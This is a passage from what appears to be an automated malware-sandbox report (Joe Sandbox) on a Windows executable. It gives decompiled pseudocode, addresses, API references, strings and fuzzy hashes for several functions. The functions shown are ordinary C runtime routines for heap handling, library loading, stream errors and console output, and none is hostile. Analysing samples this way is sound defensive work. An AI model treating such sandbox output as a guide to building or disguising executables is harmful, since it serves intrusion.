									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E0041E864();
									if(_t95 != 0) {
										E0040D391(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E0041D4FF(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E0040DD70(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E0041D12E(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E0041D4FF(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E0040DD70(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x0041f9d7
0x0041f9d8
0x0041f9d9
0x0041f9e0
0x0041f9e5
0x0041f9eb
0x0041f9f1
0x0041f9f7
0x0041f9fa
0x0041f9fa
0x0041f9fd
0x0041f9ff
0x0041f9ff
0x0041f9fd
0x0041fa01
0x0041fa06
0x0041fa0d
0x0041fa10
0x0041fa10
0x0041fa31
0x0041fa33
0x0041fa36
0x0041fa3b
0x0041fb99
0x0041fb9c
0x0041fb9d
0x0041fb9e
0x0041fbaa
0x0041fa41
0x0041fa44
0x0041fa49
0x0041fa4b
0x0041fa4d
0x0041fa84
0x0041fa86
0x0041fa88
0x0041fb8e
0x0041fb8e
0x0041fb90
0x0041fb91
0x0041fb97
0x00000000
0x0041fb97
0x0041fa97
0x0041fa9c
0x0041faa1
0x00000000
0x00000000
0x0041faa7
0x0041fabe
0x0041fac2
0x00000000
0x00000000
0x0041fac8
0x0041fad0
0x0041fb0d
0x0041fb12
0x0041fb14
0x0041fb16
0x0041fb47
0x0041fb49
0x0041fb4b
0x0041fb87
0x0041fb88
0x00000000
0x0041fb68
0x0041fb6a
0x0041fb6b
0x0041fb6f
0x0041fbab
0x0041fbae
0x0041fb71
0x0041fb71
0x0041fb72
0x0041fb72
0x0041fb73
0x0041fb74
0x0041fb75
0x0041fb76
0x0041fb7e
0x0041fb85
0x0041fbb4
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fb85
0x0041fb4b
0x0041fb1a
0x0041fb35
0x0041fb3a
0x00000000
0x00000000
0x0041fb3c
0x0041fb42
0x0041fb42
0x00000000
0x0041fb42
0x0041fb1c
0x0041fb21
0x0041fb25
0x00000000
0x00000000
0x0041fb27
0x00000000
0x0041fb27
0x0041fad2
0x0041fad7
0x00000000
0x00000000
0x0041fadf
0x00000000
0x00000000
0x0041fafb
0x0041faff
0x00000000
0x00000000
0x00000000
0x0041fb05
0x0041fa54
0x0041fa6f
0x0041fa74
0x0041fa7f
0x0041fa7f
0x00000000
0x0041fa7f
0x0041fa76
0x0041fa7c
0x0041fa7c
0x00000000
0x0041fa7c
0x0041fa56
0x0041fa5b
0x0041fa5f
0x00000000
0x00000000
0x0041fa61
0x00000000
0x0041fa61

APIs

__alloca_probe_16.LIBCMT ref: 0041FA56
__alloca_probe_16.LIBCMT ref: 0041FB1C
__freea.LIBCMT ref: 0041FB88

Part of subcall function 0041D4FF: HeapAlloc.KERNEL32(00000000,?,?,?,0040E78B,?,?,?,?,?,00401113,?,?), ref: 0041D531

__freea.LIBCMT ref: 0041FB91
__freea.LIBCMT ref: 0041FBB4

Strings

D1B, xrefs: 0041F9E4

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID: D1B
API String ID: 1096550386-3596475136
Opcode ID: db90e4d2ddbd84a82c7ebe524002e52f3c7e6d618a6721dcb97627106a48cae1
Instruction ID: ed2b1603d9b4c897e74b97fad5a649024dbe20ac7f2bb9c13e93f23a59dd484c
Opcode Fuzzy Hash: db90e4d2ddbd84a82c7ebe524002e52f3c7e6d618a6721dcb97627106a48cae1
Instruction Fuzzy Hash: A651E5B2904206ABDB209F65DC41EFB37A9EF84754F25013AFD04A7240D73DEC968698

Uniqueness

Uniqueness Score: -1.00%

Function 0082B547 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0082B57D
std::_Lockit::_Lockit.LIBCPMT ref: 0082B59D
std::_Lockit::~_Lockit.LIBCPMT ref: 0082B5BD
std::_Facet_Register.LIBCPMT ref: 0082B658
std::_Lockit::~_Lockit.LIBCPMT ref: 0082B670

Strings

yC, xrefs: 0082B62D

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: yC
API String ID: 459529453-4112074249
Opcode ID: 27a2cb42cd30e4c7bfa284586484182bedf89f5584a3442a3d818d1f2bc5fd12
Instruction ID: c74521b45d44c45fa64c8de4ffb362d4e26f5a990a07c3b752d827a2b34c43ac
Opcode Fuzzy Hash: 27a2cb42cd30e4c7bfa284586484182bedf89f5584a3442a3d818d1f2bc5fd12
Instruction Fuzzy Hash: 8E41AF719012648BCB24CF58E992BAEBBB0FB54714F24416DE806EB291DB75AD81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 004229D3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004229D3(intOrPtr* _a4, intOrPtr _a8, char _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t7 =  &_a16; // 0x422b26
						_t14 = E0041E864( *_t7, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E0041E864(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E00411DAB(GetLastError());
									_t17 =  *((intOrPtr*)(E00411DE1(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00418562(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00411DAB(GetLastError());
						_t17 =  *((intOrPtr*)(E00411DE1(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00418562(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E004185E7(_a8);
				return 0;
			}

0x004229d9
0x004229de
0x004229f2
0x004229f5
0x00422a24
0x00422a27
0x00422a2f
0x00422a31
0x00422a4a
0x00422a4d
0x00422a50
0x00422a5e
0x00422a6d
0x00422a75
0x00422a77
0x00422a90
0x00422a93
0x00422a93
0x00422a79
0x00422a80
0x00422a8b
0x00422a8b
0x00422a95
0x00422a96
0x00000000
0x00422a96
0x00422a55
0x00422a5a
0x00422a5c
0x00000000
0x00000000
0x00000000
0x00422a5c
0x00422a3a
0x00422a45
0x00000000
0x00422a45
0x004229f7
0x004229fa
0x004229fd
0x00422a10
0x00422a13
0x00422a15
0x00422a17
0x00000000
0x00422a17
0x00422a03
0x00422a08
0x00422a0a
0x00000000
0x00000000
0x00000000
0x00422a0a
0x004229e3
0x00000000

Strings

&+B, xrefs: 00422A24
C:\Users\user\Desktop\qjrOWCCE58.exe, xrefs: 004229D8

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID: &+B$C:\Users\user\Desktop\qjrOWCCE58.exe
API String ID: 0-2850174187
Opcode ID: 4f70b34f5ad614ad27d14a240363faa0e17a61b9ca73a05325968c1d22870131
Instruction ID: 2dbf4412fffd8efa3fb79c7b613c821595c4fd4f594ef1a14efded8df7fe8f6b
Opcode Fuzzy Hash: 4f70b34f5ad614ad27d14a240363faa0e17a61b9ca73a05325968c1d22870131
Instruction Fuzzy Hash: 47216A70700226BFC730AFA2AD818AB736DEF003A8750451BF91993650DB78EC418368

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC98 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041CC98(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x43cae8 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x42fb60 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00414A84(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00414A84(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x0041cca1
0x0041cd4b
0x0041cca9
0x0041ccab
0x0041ccb2
0x0041ccb4
0x0041ccba
0x0041ccc7
0x0041ccdc
0x0041cce0
0x0041cd32
0x0041cd32
0x0041cd37
0x0041cd3b
0x0041cd3e
0x0041cd3e
0x0041cd44
0x0041cd46
0x0041cd5b
0x0041cd56
0x0041cd5a
0x0041cd5a
0x0041cd48
0x0041cd48
0x00000000
0x0041cd48
0x0041cce2
0x0041cceb
0x0041cd22
0x0041cd22
0x0041cd24
0x0041cd26
0x00000000
0x00000000
0x0041cd2e
0x00000000
0x0041cd2e
0x0041ccf5
0x0041ccfa
0x0041ccff
0x00000000
0x00000000
0x0041cd09
0x0041cd0e
0x0041cd13
0x00000000
0x00000000
0x0041cd18
0x0041cd1e
0x00000000
0x0041cd1e
0x0041ccbf
0x00000000
0x00000000
0x00000000
0x0041ccc5
0x0041cd54
0x00000000

Strings

ext-ms-, xrefs: 0041CD03
api-ms-, xrefs: 0041CCEF

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 2a8e9d97af6733ed43e1a6ee6462d21185f5b33367ae305ea3e02a7c1e0e01fc
Instruction ID: e83af818d6692473047301ebc6d4b3face1962f5a56bf5cd303e4b0a1eb7b71f
Opcode Fuzzy Hash: 2a8e9d97af6733ed43e1a6ee6462d21185f5b33367ae305ea3e02a7c1e0e01fc
Instruction Fuzzy Hash: 6721C671A81224A7DB318728ECC1BDB3B689F057A0F610136E905AB391E638EC81C6DC

Uniqueness

Uniqueness Score: -1.00%

Function 004247E1 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004247E1(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0042452D(_t45, 7);
					E0042452D(_t45 + 0x1c, 7);
					E0042452D(_t45 + 0x38, 0xc);
					E0042452D(_t45 + 0x68, 0xc);
					E0042452D(_t45 + 0x98, 2);
					E0041CA88( *((intOrPtr*)(_t45 + 0xa0)));
					E0041CA88( *((intOrPtr*)(_t45 + 0xa4)));
					E0041CA88( *((intOrPtr*)(_t45 + 0xa8)));
					E0042452D(_t45 + 0xb4, 7);
					E0042452D(_t45 + 0xd0, 7);
					E0042452D(_t45 + 0xec, 0xc);
					E0042452D(_t45 + 0x11c, 0xc);
					E0042452D(_t45 + 0x14c, 2);
					E0041CA88( *((intOrPtr*)(_t45 + 0x154)));
					E0041CA88( *((intOrPtr*)(_t45 + 0x158)));
					E0041CA88( *((intOrPtr*)(_t45 + 0x15c)));
					return E0041CA88( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x004247e7
0x004247ec
0x004247f5
0x00424800
0x0042480b
0x00424816
0x00424824
0x0042482f
0x0042483a
0x00424845
0x00424853
0x00424861
0x00424872
0x00424880
0x0042488e
0x00424899
0x004248a4
0x004248af
0x00000000
0x004248bf
0x004248c4

APIs

Part of subcall function 0042452D: _free.LIBCMT ref: 00424552

_free.LIBCMT ref: 0042482F

Part of subcall function 0041CA88: HeapFree.KERNEL32(00000000,00000000,?,00424557,?,00000000,?,?,?,004247FA,?,00000007,?,?,00424CED,?), ref: 0041CA9E
Part of subcall function 0041CA88: GetLastError.KERNEL32(?,?,00424557,?,00000000,?,?,?,004247FA,?,00000007,?,?,00424CED,?,?), ref: 0041CAB0

_free.LIBCMT ref: 0042483A
_free.LIBCMT ref: 00424845
_free.LIBCMT ref: 00424899
_free.LIBCMT ref: 004248A4
_free.LIBCMT ref: 004248AF
_free.LIBCMT ref: 004248BA

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
Instruction ID: 8974a821f3a60a73df581e288051425cb8b673316e29964201f11a27d9be2b61
Opcode Fuzzy Hash: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
Instruction Fuzzy Hash: 6E115CB1A80B18BBD521F7B2EC46FCB779C9F4470AFC0081BB29966452DF28A5888754

Uniqueness

Uniqueness Score: -1.00%

Function 00844A48 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00844794: _free.LIBCMT ref: 008447B9

_free.LIBCMT ref: 00844A96

Part of subcall function 0083CCEF: HeapFree.KERNEL32(00000000,00000000,?,008447BE,?,00000000,?,?,?,00844A61,?,00000007,?,?,00844F54,?), ref: 0083CD05
Part of subcall function 0083CCEF: GetLastError.KERNEL32(?,?,008447BE,?,00000000,?,?,?,00844A61,?,00000007,?,?,00844F54,?,?), ref: 0083CD17

_free.LIBCMT ref: 00844AA1
_free.LIBCMT ref: 00844AAC
_free.LIBCMT ref: 00844B00
_free.LIBCMT ref: 00844B0B
_free.LIBCMT ref: 00844B16
_free.LIBCMT ref: 00844B21

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
Instruction ID: 1be15a5d67a0864f3f7ca7c3d7e482198acf20615a08eeb9eebfa8e6d150790e
Opcode Fuzzy Hash: 0ec00478f14c113bf47a4fee4d442575f16bafd0bb01c80a52db30f625d4e359
Instruction Fuzzy Hash: 48115E71584B0CAAE620BBB4CC47FCB779CFF46B05F401815B2ADE6052DB75B50A8792

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00403C40(void* __ebx, void* __ecx, signed int _a4, char _a8) {
				char _v24;
				char _v32;
				intOrPtr _v48;
				signed int _t20;
				void* _t22;
				void* _t32;
				signed char _t35;
				intOrPtr* _t37;
				char* _t40;
				intOrPtr* _t42;
				intOrPtr _t45;

				_t32 = __ebx;
				_t20 = _a4 & 0x00000017;
				 *(__ecx + 0xc) = _t20;
				_t35 =  *(__ecx + 0x10) & _t20;
				if(_t35 == 0) {
					return _t20;
				} else {
					if(_a8 != 0) {
						E0040EC3B(0, 0);
					}
					if((_t35 & 0x00000004) == 0) {
						_t40 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
					} else {
						_t40 = "ios_base::badbit set";
					}
					_t22 = E00403410( &_v32);
					_t37 =  &_v24;
					L00403B60(_t32, _t37, _t40, _t22);
					E0040EC3B( &_v32, 0x439f88);
					asm("int3");
					_t45 = _v48;
					asm("xorps xmm0, xmm0");
					_t42 = _t37;
					 *_t42 = 0x42c2d4;
					asm("movq [eax], xmm0");
					_t14 = _t45 + 4; // 0x439f8c
					E0040E761(_t14, _t42 + 4);
					 *_t42 = 0x437c8c;
					_t15 = _t45 + 0xc; // 0x439f98
					_t16 = _t45 + 0x10; // 0x5
					 *((intOrPtr*)(_t42 + 0xc)) =  *_t15;
					 *((intOrPtr*)(_t42 + 0x10)) =  *_t16;
					 *_t42 = 0x437d04;
					return _t42;
				}
			}

0x00403c40
0x00403c4c
0x00403c4f
0x00403c55
0x00403c57
0x00403c64
0x00403c59
0x00403c5d
0x00403c6b
0x00403c6b
0x00403c73
0x00403c89
0x00403c75
0x00403c75
0x00403c75
0x00403c90
0x00403c97
0x00403c9b
0x00403caa
0x00403caf
0x00403cb4
0x00403cb7
0x00403cbb
0x00403cc1
0x00403cc7
0x00403ccb
0x00403ccf
0x00403cd4
0x00403cdd
0x00403ce0
0x00403ce3
0x00403ce8
0x00403ceb
0x00403cf4
0x00403cf4

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00403CCF

Part of subcall function 0040EC3B: RaiseException.KERNEL32(E06D7363,00000001,00000003,004011BC,?,?,?,004011BC,?,00439F24), ref: 0040EC9B

Strings

@6@, xrefs: 00403CD4
ios_base::failbit set, xrefs: 00403C7F
ios_base::eofbit set, xrefs: 00403C84
ios_base::badbit set, xrefs: 00403C75
@6@, xrefs: 00403C18, 00403CEB

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: @6@$@6@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-3413559690
Opcode ID: 0842126f8f85393a790a10f02406884724d0d7f42df4f63ee50624b2c60694db
Instruction ID: 8860ddbe53549d5d232630465e6da3a2557bb4db5b5735c734349046e02abc9e
Opcode Fuzzy Hash: 0842126f8f85393a790a10f02406884724d0d7f42df4f63ee50624b2c60694db
Instruction Fuzzy Hash: 0411D5B25083045BD310DF69C801B96B7E8AB45311F14C92BF854E7681E778EE10C75D

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF8B Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E0041EF8B(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x43b054; // 0x41d6575c
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x43c8e0 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E00411E11( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x43c8e0 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x43b298; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x43c8e0 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E0041E700( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x43b298)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x43c8e0 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E0040ECB0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x43c8e0 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E0041E700( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E0041E864(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E00417684(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x43c8e0 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x43c8e0 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x43c8e0 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E0041D68F( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E0041D68F();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
